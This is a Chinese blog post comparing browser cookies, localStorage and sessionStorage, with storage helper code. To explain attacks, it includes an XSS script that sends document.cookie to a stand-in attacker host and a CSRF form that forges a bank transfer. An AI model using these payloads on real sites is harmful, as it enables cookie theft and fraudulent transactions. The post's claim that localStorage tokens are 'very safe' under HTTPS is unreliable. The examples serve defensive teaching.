前端本地存储cookie、localstorage和sessionStorage之间的区别?

置顶 已于 2022-01-26 17:24:23 修改
阅读量2.1k 收藏 2
点赞数 3
分类专栏: 浏览器网络 文章标签: cookie sessionStorage localStorage
于 2020-06-06 15:37:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48076809/article/details/106588570
版权

一张图看懂cookie、localStorage和sessionStorage之间的区别。
一张图看懂cookie、localstorage和sessionStorage之间的区别

1.cookie

cookie的特点

(1)cookie 可以被服务器设置。
(2)浏览器每次请求会自动带上 cookie。
(3)存在跨域问题。

cookie的配置

cookie可以设置Name,Value,Domain,Path,Expires,HttpOnly,Secure,SameSite等。
HttpOnly
如果cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击,窃取cookie内容,这样就增加了cookie的安全性,即便是这样,也不要将重要信息存入cookie。

Secure
Secure只允许 cookie 在 HTTPS 请求中被使用。

SameSite
Chrome 51 开始,浏览器的 Cookie 新增加了一个SameSite属性,用来防止 CSRF 攻击和用户追踪。
cookie 的SameSite属性用来限制第三方 cookie ,从而减少安全风险。
它可以设置三个值。Strict(严格) Lax(宽松) None(无)

XSS 攻击

XSS(Cross Site Scripting)被称为跨站脚本攻击,是最普遍的Web应用安全漏洞。比如你在一个论坛,这个论坛有个 bug:不会对发布内容中的 HTML 标签进行过滤。
某一天,一个恶意用户发了个帖子,内容如下:

<script>window.open("atacker.com?cookie=" + document.cookie</script>

当你访问这条帖子的内容时,浏览器就会执行 script 中的代码,导致你的 cookie 被发送给攻击者,接着攻击者就可以利用你的 cookie 登录论坛,然后为所欲为了。
XSS 攻击在很多情况下,用户甚至不会知道自己被攻击了,比如利用 img的 src 属性,就可以做到悄无声息的把用户的信息发给攻击者。
而当设置了 HttpOnly 后,ducoment.cookie 将获取不到 cookie,攻击者的代码自然就无法生效了。

cookie的使用

//设置
function setCookie(name, value, time) {
  let expireTime = time || 30;
  let today = new Date();
  today.setTime(today.getTime() + expireTime * 24 * 60 * 60 * 1000); //换算成毫秒
  document.cookie = name + "=" + escape(value) + ";path=/;expires=" + today.toGMTString();
}

//获取
function getCookie(name){
  var strCookie = document.cookie;//获取cookie字符串
  var arrCookie = strCookie.split("; ");//分割
  //遍历匹配
  for ( var i = 0; i < arrCookie .length; i++) {
      var arr = arrCookie[i].split("=");
      if (arr[0] == name){
          return arr[1];
      }
  }
  return "";
}
//删除
function delCookie(name) {
  let today = new Date();
  today.setTime(today.getTime() - 1);
  let value = getCookie(name);
  value && (document.cookie = name + "=" + value+ ";path=/;expires=" + today.toGMTString())
}

如何设置第二天过期?

function setExpireTime(n){
	var ctuskytime = new Date();
	ctuskytime.setDate( ctuskytime.getDate()+1);
	ctuskytime.setHours(0);
	ctuskytime.setMinutes(0);
	ctuskytime.setSeconds(0);
	document.cookie="ctuskytime_cookie;expires="+ctuskytime.toGMTString();
}

cookie 总结

总而言之,cookie 在今天的适用场景其实比较有限,当你需要在本地储存数据时,由于安全性和储存空间的问题,一般不推荐使用 cookie,大部分情况下使用 Web Storage 是个更好的选择。

2.Web Storage

Web Storage特点

Web Storage分为localStorage与sessionStorage。
使用key和value,以字符串形式存储,一般为5M,各个浏览器有所不同,使用起来简单方便。localStorage的信息会被一直存储,除非被手动清除;sessionStorage仅在当前会话有效,关闭浏览器则被清除。

Web Storage和 Cookie 的主要区别

1.储存空间更大,使用更方便。
2.cookie 可以被服务器设置,而Web Storage只能浏览器端设置。
3.cookie 的数据会由浏览器自动发给服务器(但需设置cookie的domain、path参数),Web Storage 需要手动取出来放到请求里面才会发给服务器,因此可以避免 CSRF 攻击。

CSRF 攻击

CSRF(Cross-site request forgery) 攻击被称为跨站请求伪造。
假设你在浏览器中登录过某个银行 bank.com,这个银行系统使用 cookie 来保存你的登录状态。接着你访问了一个恶意网站,该网站中有一个表单:

<form action="bank.com/transfer" method="post">
    <input type="hidden" name="amount" value="100000.00"/>
    <input type="hidden" name="target" value="attacker"/>
    <input type="submit" value="点击就送美女!"/>
</form>

(假设 bank.com/transfer 是用来转账的接口)

当你被诱导点下了提交按钮后:

由于 form 表单提交是可以跨域的,你将会对 bank.com/transfer 发起一次post 请求。

由于此前你已经登录过 bank.com,浏览器会自动将你的 cookie 一并发送过去(即使你当前并未处于银行系统的页面)。

bank.com 收到你的带 cookie 的请求后,认为你是正常登录了的,导致转账成功进行。

最终你损失了一大笔钱。

注意即使用 cookie 配合 HTTPS 请求,CSRF 攻击也无法被避免,因为 HTTPS 请求只是对传输的数据进行了加密,而 CSRF 攻击的特点是,诱导你去访问某个需要你的权限的接口,HTTPS 并不能阻止这种访问。

这里的 CSRF 攻击的核心,就是利用了浏览器会自动在所有请求里带上 Cookie 的特性。

因此,localStorage 比较常见的一个替代 cookie 的场景就是登录态的保持,比如用 token 的方法加上 HTTPS 请求,就可以很大程度上提高登录的安全性,避免被 CSRF 攻击(但是依然无法完全避免被 XSS 攻击的风险)。

大概工作流程就是,用户登录后,从服务器拿到一个 token,然后存进 localStorage 里,之后每次请求前都从 localStorage 里取出 token,放到请求数据里,服务器就能知道是同一个用户在发起请求了;由于 HTTPS 的存在,也不用担心 token 会被泄露给第三方,因此是很安全的。

Web Storage的用法

localStorage与sessionStorage用法一样,以localStorage为例

const storage = window.localStorage;
storage.setItem(key,value);   
storage.getItem(key);
storage.removeItem(key);
storage.clear();

localStorage与sessionStorage里存的是字符串形式,若存的类型是object,存时需要使用JSON.stringify,取出来时JSON.parse转换下

//存储
function setSession(key,value){
    if(typeof value == "object"){
        value = JSON.stringify(value);
    }
    sessionStorage.setItem(key, value);
}
//获取
function getSession(key){
    let value = sessionStorage.getItem(key);
    let json = JSON.parse(value);
    if(typeof json == "object" && json){
        return json;
    }
    return value;
}
//清除
function clearSession(){
    sessionStorage.clear();
}
//判断是否有
function hasKey(key){
    if(getSession(key) == "")
        return false;
    return true;
}

Web Storage总结

在大部分应用场景下,Web Storage已经能够完全替代cookie,但有些需要服务端设置cookie的情况下,例如广告这种情形,cookie还有自身的价值。但localStorage的存储空间并不大,并且存储只支持字符串,并不适合存储大量的数据和复杂的数据。这样就出现了IndexedDB,类似于后端数据库,因为我也没太用过,这里我就不多做阐述了。

尼克_张
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
localstoragecookie区别
PURPLESWEETTTTT的博客
12-28 251
localstoragecookie都可以用来做本地储存,实现数据持久化。
前端Cookie,Token,Session,Storage;等名词详解与应用,干货满满“建议收藏”
最新发布
2401_84091110的博客
04-22 742
整理面试题,不是让大家去只刷面试题,而是熟悉目前实际面试中常见的考察方式和知识点,做到心中有数,也可以用来自查及完善知识体系。《前端基础面试题》,《前端校招面试题精编解析大全》,《前端面试题宝典》,《前端面试题:常用算法》PDF完整版点击这里免费领取片转存中…(img-PrKFmuP8-1713716088959)][外链图片转存中…(img-RR6911IT-1713716088959)][外链图片转存中…(img-9VOygGu1-1713716088959)]
cookies、localStoragesessionStorage区别
weixin_47227886的博客
04-10 5335
介绍:cookie,意思是小甜饼,顾名思义,cookie 确实非常小,它的大小限制为 4KB 左右;每个 HTTP 请求都会带着 Cookie 的信息,所以 Cookie 当然是能精 简就精简!常用的应用场景:判断用户是否登录。介绍:localStorage,它是 HTML5 标准中新加入的技术,localStorage 已经被大多数浏览器所支持; sessionStorage,它与 localStorage 的接口类似,但保存数据的生命周期与 localStorage 不同,它只是
localStorage,sessionStorage,cookie使用场景区别
hard_boy的博客
03-21 855
localStorage:HTML5新增的在浏览器端存储数据的方法。设置和获取localStorage的方法:设置: localStorage.name = 'zjj';获取: localStorage.name //zjjsessionStorage: HTML5新增的在浏览器端存储数据的方法,设置和获取sessionStorage的方法:设置: sessionStorage.name = 'z...
cookie、session、localStoragesessionStorage 区别及应用场景
weixin_43190804的博客
02-23 3936
1.概念理解 Cookie它的主要用途有保存登录信息,比如你登录某个网站市场可以看到“记住密码”,这通常就是通过在 Cookie 中存入一段辨别用户身份的数据来实现的。 localStorage 是 HTML5 标准中新加入的技术,localStorage的生命周期是永久性的。假若使用localStorage存储数据,即使关闭浏览器,也不会让数据消失,除非主动的去删除数据。 sessionStoragelocalStorage 的接口类似,相较cookie一般存储大一些的数据,但保存数据的生命周期与
cookielocalStorage,sessionStorage区别与应用
01-07
cookie localStorage sessionStorage 概念 存放在客户端的一段文本信息 存储在客户端的临时信息,只能存放字符串类型数据 同localStorage 大小 4k 5M 5M 生命周期 浏览器关闭,数据清空 存在内存中,除非...
常见的浏览器存储方式(cookielocalStoragesessionStorage
11-27
今天我们从前端的角度了解一下浏览器存储,我们常见且常用的存储方式主要由两种:cookie、webStorage(localStoragesessionStorage)。下面我们来一一认识它们。 Cookie基于HTTP规范,用来识别用户。 Cookie是...
cookie/session/localstorage/sessionstorage】【前端】web中的k-v存储们有什么区别
08-31
cookie_session_localstorage_sessionstorage】【前端】web中的k-v存储们有什么区别
详解vue中localStorage的使用方法
12-09
对浏览器来说,使用 Web Storage 存储键值对比存储 Cookie 方式更直观,而且容量更大,它包含两种:localStoragesessionStorage 1.sessionStorage(临时存储) :为每一个数据源维持一个存储区域,在浏览器打开...
GoDB.js:IndexedDB with Intuitive API,轻松搞定浏览器数据库:party_popper:
05-06
English | GoDB.js 具有Intuitive API的IndexedDB,具有一行代码的CRUD。 警告:此项目目前处于Beta状态,表示: 不要在任何严肃的项目中使用它 设计的功能尚未完全实现 这些API将来可能会发生重大变化 如果您认为有帮助,请给该项目加星标,谢谢〜 安装 npm install godb 用法 用一行代码执行CRUD操作: import GoDB from 'godb' ; const testDB = new GoDB ( 'testDB' ) ; const user = testDB . table ( 'user' ) ; const data = { name : 'luke' , age : 22 } ; user . add ( data ) // Create . then ( luke => user . get ( lu
GoDB3.4软件
04-15
网上很难找的GoDB软件,IPNC中的网页是由此软件设计。
GoDB开发踩坑记(代码实现)
wdssean的博客
03-05 1352
前言 之前写了一篇GoDB开发踩坑记但是内容有些不全,所以来补充一下。所以没看过GoDB开发踩坑记的可以先看一下那篇文章。 正文 golang encode_josn——把map[string]interface{}转换为json字符串 这里用到了encoding/json包(请自行引入)中的json.Marshal函数,代码如下: func encode_json(data map[string]interface{})(string){ js,_:=json.Marshal(data); retu
【Web技术】1295- 总结一下前端本地储存方案
pingan8787
04-19 493
作者:星尘starxhttps://juejin.cn/post/6925311938419408904引言2022 年,如果你的前端应用,需要在浏览器上保存数据,有三个主流方案:CookieWeb Storage (LocalStorage)IndexedDB这些方案就是如今应用最广、浏览器兼容性最高的三种前端储存方案今天这篇文章就聊一聊这三种方案的历史,优缺点,以及各...
vue3 vite ts 打包成功部署到服务器访问时报错Converting circular structure to JSON --> starting at object with co
baiyajin的博客
11-18 3973
vue3 vite ts 打包成功部署到服务器访问时报错Converting circular structure to JSON --> starting at object with co
记一次 JSON.stringfy(xxx) 的报错
chitianshenshi的博客
12-29 1619
代码:this.saveParam = JSON.stringify(cloneFinalForm); 报错: TypeError: Converting circular structure to JSON --> starting at object with constructor 'Window' --- property 'window' closes the circle at JSON.stringify (<anonymous>) ...
赋值,浅拷贝,深拷贝的区别
05-30 1123
一、赋值(Copy) 赋值是将某一数值或对象赋给某个变量的过程,分为下面 2 部分: 基本数据类型:赋值,赋值之后两个变量互不影响 引用数据类型:赋址,两个变量具有相同的引用,指向同一个对象,相互之间有影响 let a = 10; let b = a; console.log(a);//10 console.log(b);//100 a = 100; console.log(a);//100 console.log(b);//10 对基本类型进行赋值操作,两个变量互不影响。 let a = { age:
数据本地存储方法封装(笔记)localStoragesessionStorage
小糖穿越火线
09-09 416
数据本地存储方法封装(笔记)localStoragesessionStorage 方法: import storage from 'good-storage' const SELLER_KEY = '__seller__' export function saveToLocal(id, key, val) { const seller = storage.get(SELLER_KE...
monggodb 和 node.js使用
阿洪的博客
12-26 764
monggodb 和 node.js使用 这几天搭建了个人的小博客,但是并没用到数据库,仅仅用到前后端的知识。所以我想把monggodb简单的记录一下,选择monggodb和node.js当然是因为他们简单上手。废话不多说。 一,mongogdb的连接 一般window启动monggodb默认是27107端口,所以可在node.js中这样写。 // mongodb 连接
cookie, localStorage,sessionStorage区别
08-12
CookielocalStoragesessionStorage是在前端中用于存储数据的三种机制,它们有一些区别和适用场景。 1. Cookie: - 存储容量较小(一般为4KB),每个域名下的Cookie数量也有限制。 - 可以设置过期时间,可以在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值